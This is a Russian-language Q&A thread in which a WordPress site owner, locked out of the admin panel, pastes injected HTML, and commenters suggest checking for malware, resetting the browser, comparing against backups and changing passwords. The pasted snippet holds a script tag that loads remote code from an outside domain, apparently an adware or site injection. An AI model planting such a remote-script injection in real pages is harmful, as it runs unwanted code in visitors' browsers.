# Перестал попадать в админку wordpress

Tags: php, wordpress

Что-то намутил в кодом - перестал попадать в админку *wordpress* (в консоли ошибок не обнаружено ), при том, что сам сайт грузится исправно.

В стилях вот что пишет:

```
<html>
 <head>
  <script src="//agitated.ru/getscripts2?&amp;b=e722631c0dab8f7e59d6c4eaaac1c729&amp;uid=5bd22d3c9ec7c37514e0de909dcca5ba&amp;insd=2015-05-12&amp;sid=&amp;df=&amp;r=&amp;h=twinpigs.likemedia.by&amp;rand=1438184155734">
  </script>
 </head>
 <body style="zoom: 1;">
 </body>
</html>
```

Где копать корень проблемы?
Расширения - скрин браузера
[image: скрин 1]
[image: скрин 2]

Comment: Упоминается тут http://habrahabr.ru/post/257361/ Проверяйте браузер/комп на вредоносное ПО.

Comment: @Visman ссылка ведет вот сюда - http://agitated.ru/getscripts2?&amp;b=e722631c0dab8f7e59d6c4eaaac1c729&amp;uid=5bd22d3c9ec7c37514e0de909dcca5ba&amp;insd=2015-05-12&amp;sid=&amp;df=&amp;r=&amp;h=twinpigs.likemedia.by&amp;rand=1438184155734
это какой-то злостный блокировщик?

Comment: Вы разве статью не прочитали, ссылку на которую я дал? Там по пунктам все расписано.

Comment: @Visman а что вы предлагаете - найти у себя подключение этих скриптов? так по поиску ничего конкретного не находит

Comment: Скриншот страницы расширений вашего браузера покажите тут.

Comment: @Visman добавил вверху

Comment: Сброс настроек хрома сделайте у себя.

Comment: @Visman безрезультатно на 2ух компах

Comment: Хм. На двух разных компьютеров одни и те же ссылки в страницу встраиваются? Проверяйте файлы на сайте на наличие изменений.

Comment: @Visman перелопатить 1000+ файлов? нет уж, извольте - я лучше бекапну, точно меньше времени на восстановление

Comment: Восстановление из бэкапа помогло?

Comment: @Visman не знаю, еще не делали, но я вижу что там ка минимум еще зараза висит, которая мои данные еще со старого скрипта подтягивает и выводит

Comment: Надо избавляться от заразы. Проверять полностью на вирусы компьютеры с которых был доступ по ftp и к админке сайта. Менять пароли ftp и админов на сайте.

Comment: компы-то я проверю и пароли поменяю, но как саму ее обнаружить?
цепляется какая-то фигня на вывод под видом скрипта вида `VM222081`

Comment: Так вы сами отказались от проверки файлов. А надо было сверить заведомо не зараженный бэкап с текущим снимком сайта. Есть же программы для построения различий на вроде diff. Или github можно для этого использовать было.

Comment: я думаю, вирус уже давным-давно в бекапе находился, так что отыскать заведомо незараженный бекап если и возможно, то только на ранних стадиях проекта..
не знаю как эти программы можно увязать с магазином woocommerce.

Comment: @Visman бекап помог, но зараза VM**** по-прежнему продолжает висеть